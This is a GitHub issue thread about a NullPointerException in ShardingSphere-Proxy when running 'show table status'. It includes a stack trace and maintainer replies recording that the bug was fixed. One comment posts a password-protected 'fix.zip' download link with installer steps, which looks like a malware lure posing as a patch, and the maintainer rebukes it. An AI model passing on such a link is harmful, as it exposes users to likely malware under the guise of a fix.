### ISSUE TITLE
NPE occurs  when  execute show table status

### ISSUE THREAD

**Issue by RaigorJiang** [apache/shardingsphere#32680]
### Which version of ShardingSphere did you use?
5.5.1-SNAPSHOT master e55969073952e82c9192f1876d48bec3dba511c6

### Which project did you use? ShardingSphere-JDBC or ShardingSphere-Proxy?
ShardingSphere-Proxy

### Actual behavior
- Client
```plain
mysql> show table status;
ERROR 30000 (HY000): Unknown exception.
More details: java.lang.NullPointerException: Cannot invoke "java.math.BigInteger.add(java.math.BigInteger)" because "num1" is null
mysql> 
```

- Proxy log
```plain
[INFO ] 2024-08-26 18:04:06.880 [ShardingSphere-Command-0] ShardingSphere-SQL - Logic SQL: show table status
[INFO ] 2024-08-26 18:04:06.880 [ShardingSphere-Command-0] ShardingSphere-SQL - Actual SQL: ds_1 ::: show table status
[INFO ] 2024-08-26 18:04:06.880 [ShardingSphere-Command-0] ShardingSphere-SQL - Actual SQL: ds_0 ::: show table status
[ERROR] 2024-08-26 18:04:07.089 [ShardingSphere-Command-0] o.a.s.p.f.c.CommandExecutorTask - Exception occur: 
java.lang.NullPointerException: Cannot invoke "java.math.BigInteger.add(java.math.BigInteger)" because "num1" is null
	at org.apache.shardingsphere.sharding.merge.dal.show.ShowTableStatusMergedResult.sum(ShowTableStatusMergedResult.java:77)
	at org.apache.shardingsphere.sharding.merge.dal.show.ShowTableStatusMergedResult.merge(ShowTableStatusMergedResult.java:68)
	at org.apache.shardingsphere.sharding.merge.dal.show.ShowTableStatusMergedResult.init(ShowTableStatusMergedResult.java:58)
	at org.apache.shardingsphere.sharding.merge.dal.show.ShowTableStatusMergedResult.init(ShowTableStatusMergedResult.java:39)
	at org.apache.shardingsphere.infra.merge.result.impl.memory.MemoryMergedResult.<init>(MemoryMergedResult.java:57)
	at org.apache.shardingsphere.sharding.merge.dal.show.ShowTableStatusMergedResult.<init>(ShowTableStatusMergedResult.java:43)
	at org.apache.shardingsphere.sharding.merge.dal.ShardingDALResultMerger.merge(ShardingDALResultMerger.java:71)
	at org.apache.shardingsphere.infra.merge.MergeEngine.executeMerge(MergeEngine.java:88)
	at org.apache.shardingsphere.infra.merge.MergeEngine.merge(MergeEngine.java:78)
	at org.apache.shardingsphere.proxy.backend.connector.DatabaseConnector.mergeQuery(DatabaseConnector.java:320)
	at org.apache.shardingsphere.proxy.backend.connector.DatabaseConnector.processExecuteQuery(DatabaseConnector.java:290)
	at org.apache.shardingsphere.proxy.backend.connector.DatabaseConnector.doExecute(DatabaseConnector.java:251)
	at org.apache.shardingsphere.proxy.backend.connector.DatabaseConnector.execute(DatabaseConnector.java:199)
	at org.apache.shardingsphere.proxy.frontend.mysql.command.query.text.query.MySQLComQueryPacketExecutor.execute(MySQLComQueryPacketExecutor.java:86)
	at org.apache.shardingsphere.proxy.frontend.command.CommandExecutorTask.doExecuteCommand(CommandExecutorTask.java:126)
	at org.apache.shardingsphere.proxy.frontend.command.CommandExecutorTask.executeCommand(CommandExecutorTask.java:121)
	at org.apache.shardingsphere.proxy.frontend.command.CommandExecutorTask.run(CommandExecutorTask.java:78)
```

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RaigorJiang** [comment]
@qlqw233 Please do not post content that is not related to the project or issue.

**Comment by comecny** [comment]
"When using SHOW TABLE STATUS to query views, the column values are NULL. Has this issue been taken up by anyone? If not, could you direct me to it? I would like to participate in community development."

**Comment by RaigorJiang** [comment]
@comecny Welcome to participate in Apache ShardingSphere

**Comment by RaigorJiang** [comment]
Fixed, thank you! @totalo @comecny
